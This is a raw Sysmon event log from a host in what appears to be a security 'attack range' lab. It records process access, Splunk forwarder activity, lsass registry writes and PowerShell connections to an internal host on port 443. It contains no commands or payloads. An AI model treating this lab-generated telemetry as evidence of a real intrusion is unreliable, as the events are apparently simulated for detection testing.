21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035126770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:25.255{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61937-false10.0.1.12-8000- 23542300x800000000000000035126769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:00.284{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFEECDA474D6C910936288C99012DE2B,SHA256=44F40BC5AD62D53565C841E7B4FB1D526CEB71F8365387359EAD849FAB894E0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:01.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8617E0598408635B4485531E6E511C8F,SHA256=57EC9BC328570CBBBC5C0859B6F5C6106344677B047123E9DCE06EA75D714935,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:01.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BF97FD82A5DD0C5952BAEAA074B58CE,SHA256=6437EFAAF5F9B30E96FBBE9E518BD1C3DD012F6D8FDBD2612B23B3341C12A0EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.460{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61939-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.054{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61938-false10.0.1.12-8089- 23542300x800000000000000035126773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:02.314{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B19D95360CDEC9D4E7DB3F21288CC9,SHA256=F550452635775E1EDE384955F1AE5D56A308A9F76EF72940570BFA8ADE527B33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:03.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3343AB27D6145D6492B73D2A8FCE73D,SHA256=733BA73C936112EB2316EB14935B53D0C0B7E4C959A43AB06D8C316C33ADB6B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:04.337{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E8431D058AA922A040FA2232F99495,SHA256=B7A430E4DAB914C599038327E0390604B7BC4082F1815A818B11BBEFE0D35E79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:05.352{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159BCD17B09B08C18FE3EA544B5DE0BB,SHA256=B7568DAC0DBF765EC7DD006B503A3E0AD24886AF904315D598A3C4A5CA90C3A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:31.460{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61941-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:31.243{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61940-false10.0.1.12-8000- 23542300x800000000000000035126780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:06.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47295D8895DF8731669301EE43D243F,SHA256=12E6AC4B603E297EA9BBFBA75E6048B579327F10B0EC600442386D157C845DEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:06.367{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=17225BA29D0B646CFCA340FADE93FF20,SHA256=1FB66540022C8503E1FB63BBC922A9062B4A0500C71D6AF5D886B4630FF6AE75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:07.404{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=648C0B882D31C1302E57BA969C4A33C4,SHA256=47CBA25BF91610B07FE20A8617A42364112FBEDDE6871A7F77CBD7353BCFF3FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:08.418{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=237B921F141EF0968AACA54A70634C98,SHA256=CC0D1101DA4E330FCF1C50FBE84FA3B4368D365237B22D4334907603C0C8CFD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:09.434{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5913C1ED6D7ECAC56D619C65F0679097,SHA256=B8FE28B7B7218655B18852A505F35C113191F2ACE2FB379B79F9456840D6FF37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035126805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035126804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x724852f5) 13241300x800000000000000035126803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a5bc-0x474a1475) 13241300x800000000000000035126802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5c4-0xa90e7c75) 13241300x800000000000000035126801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5cd-0x0ad2e475) 13241300x800000000000000035126800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035126799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x724852f5) 13241300x800000000000000035126798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a5bc-0x474a1475) 13241300x800000000000000035126797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5c4-0xa90e7c75) 13241300x800000000000000035126796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:50:10.564{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5cd-0x0ad2e475) 10341000x800000000000000035126795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.533{B81B27B7-8192-613A-9396-03000000C801}12244276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035126794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.450{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77D00763B1508A467ED1B63004E0AD3,SHA256=198298000031E1C901AC3C12A9EE6875480D6D223AF0B1F366725FDFAD7E345A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.364{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8192-613A-9396-03000000C801}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.364{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8192-613A-9396-03000000C801}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.364{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.364{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.364{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 